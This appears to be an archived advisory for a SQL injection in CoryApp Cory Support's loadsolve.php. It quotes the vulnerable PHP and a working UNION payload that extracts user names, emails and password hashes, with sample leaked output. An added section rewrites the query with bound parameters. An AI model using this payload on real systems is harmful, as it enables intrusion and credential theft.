Mayk0

CoryApp Cory Support SQL Injection Vulnerability

Mar 2nd, 2014
Full title: CoryApp Cory Support SQL Injection Vulnerability
Date add: 2014-03-02
Category: web applications
Platform: php
Risk: Security Risk High
Description: CoryApp Cory Support suffers from a remote SQL injection vulnerability.

=========================================

# Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities
# Google Dork: None
# Date: 02,March 02,2014
# Exploit Author: Slotleet
# Vendor Homepage: http://coryapp.com
# Software Link: http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (you have to register)
# Version: None
# Tested on: Win,Linux
# Greet'z : I-HMX <3
==========================
Vulnerability Description
==========================

Cory Support is prone to GET-based MySQL injection vulnerabilities.

==========================
PoC-Exploit
==========================

// GET MySQL Injection with "q" Parameter in /loadsolve.php

1 : <?php
2 : require_once('includes/config.php');
3 : require_once('includes/database.php');
4 : $sql = "select Solutions, ProblemID from ".$table_prefix."problemsolutions where ProblemID = '".$_GET['q']."' limit 3";
5 : $qry = mysql_query($sql);
6 : if(mysql_num_rows($qry)>0){
7 : while($rows = mysql_fetch_array($qry)){
8 : echo '<img src="'.$base_url.'imgs/re.gif" style="margin-left:3%"/>'.stripslashes($rows['Solutions']).'<br>';
9 : }
10 : echo '<p style="margin:0px; padding:0px; margin-left:3%">. . .</p><a href="'.$base_url.'view.php?id='.$_GET['q'].'"><small><i>View more</i></small></a>';
11 : }
12 : else echo '<i>Not have answer !</i>';
13 : mysql_close();
14 : ?>

In line 3 the coder failed to secure the "q" parameter against MySQL injection.

(1) Set the GET parameter "q" to "999999.9' union all select
(select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as
char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as
char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1)
%2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks)

The injected "q" value is executed by the MySQL server when requested from a
browser (you'll see info like
'~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~)

==========================
Solution
==========================

Not Available.

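The advisory lists no fix. As an added example (not CoryApp's code and not part of the original advisory), this is one way to write the loadsolve.php lookup with a validated, bound parameter and escaped output. It assumes a numeric ProblemID, plain-text solutions, the sp_ table prefix seen in the PoC, and an in-memory SQLite database with constructed rows so that it runs offline.

```php
<?php
// Added example, not CoryApp code: loadsolve.php's query rebuilt with a bound parameter.
// Assumptions: ProblemID is numeric; table prefix "sp_" (inferred from sp_users above);
// an in-memory SQLite database with constructed rows stands in for the MySQL server.

function load_solutions(PDO $pdo, string $prefix, $q): ?array
{
    // Reject anything that is not a plain positive integer before touching the database.
    // Arrays (?q[]=1) and strings such as "1' or 'x'='x" fail this check.
    if (!is_string($q) || !ctype_digit($q) || strlen($q) > 10) {
        return null;
    }
    // The prefix comes from config, never from the request, so it may be concatenated.
    // The request value travels separately from the SQL text as a bound parameter.
    $stmt = $pdo->prepare(
        "SELECT Solutions, ProblemID FROM {$prefix}problemsolutions
         WHERE ProblemID = :id LIMIT 3"
    );
    $stmt->bindValue(':id', (int) $q, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function render_solutions(array $rows, string $baseUrl, string $q): string
{
    if ($rows === []) {
        return '<i>Not have answer !</i>';
    }
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    $html = '';
    foreach ($rows as $row) {
        // Stored text is escaped on output; the original echoed it raw.
        $html .= '<img src="' . $esc($baseUrl) . 'imgs/re.gif" style="margin-left:3%"/>'
               . $esc($row['Solutions']) . '<br>';
    }
    // q is validated above, and still URL-encoded before it enters the href.
    return $html . '<a href="' . $esc($baseUrl) . 'view.php?id=' . rawurlencode($q)
         . '"><small><i>View more</i></small></a>';
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE sp_problemsolutions (ProblemID INTEGER, Solutions TEXT)");
$pdo->exec("INSERT INTO sp_problemsolutions VALUES (1, 'Restart the service'), (2, 'Clear cache')");

foreach (['1', "1' or 'x'='x", '999'] as $q) {   // valid id, injection-shaped input, unknown id
    $rows = load_solutions($pdo, 'sp_', $q);
    echo $rows === null ? "rejected\n" : render_solutions($rows, 'http://localhost/', $q) . "\n";
}
```

Against MySQL the same function works with a mysql: DSN; set PDO::ATTR_EMULATE_PREPARES to false so the server performs the binding.
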
==========================
Credits
==========================

Vulnerabilities found and advisory written by Slotleet.